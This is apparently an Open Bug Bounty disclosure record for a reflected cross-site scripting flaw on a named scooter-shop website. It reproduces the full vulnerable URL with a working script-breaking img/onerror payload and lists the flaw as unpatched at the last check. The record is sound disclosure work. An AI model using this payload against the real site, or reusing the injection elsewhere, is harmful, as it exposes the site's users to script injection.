sip-scootershop.com XSS vulnerability

2017-10-14T00:34:00
ID OBB:337836
Type openbugbounty
Reporter OmniGooch
Modified 2018-01-12T01:30:00

Description

Vulnerable URL:
https://sip-scootershop.com/main/base/Results.aspx?t=%3c%2fscript%3e%3cimg+src%3dx+onerror%3dprompt(%2fXSSPOSED%2f)%3e&d;=(sco,ape,lam,old,px,sma,max,atv,mot)&a;=1&sort;=0
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 12.01.2018
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 87750
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 14 October, 2017 00:34 GMT
Generic security notifications sent to website owner| 14 October, 2017 00:37 GMT
Notification sent to subscribers (without technical details)| 14 October, 2017 02:17 GMT
Vulnerability details disclosed by researcher| 12 January, 2018 01:30 GMT